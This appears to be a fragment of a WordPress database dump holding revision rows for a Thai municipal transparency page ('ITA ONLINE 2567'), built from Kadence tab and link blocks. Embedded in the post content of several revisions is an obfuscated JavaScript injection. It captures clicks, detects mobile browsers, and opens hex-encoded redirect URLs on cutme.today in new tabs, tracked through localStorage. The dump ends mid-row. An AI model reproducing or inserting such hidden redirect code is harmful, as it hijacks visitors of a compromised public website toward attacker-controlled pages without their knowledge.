_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:23:00','2024-08-19 05:23:00','',871,'http://pakhaeng.ssk.in.th/?p=878',0,'revision','',0),
(879,1,'2024-08-19 12:35:15','2024-08-19 05:35:15','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"size\":1.1,\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f19143-44\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f19143-44\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_a70426-ef\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_a70426-ef\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:35:15','2024-08-19 05:35:15','',871,'http://pakhaeng.ssk.in.th/?p=879',0,'revision','',0),
(881,1,'2024-08-19 12:37:55','2024-08-19 05:37:55','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"size\":1.1,\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div 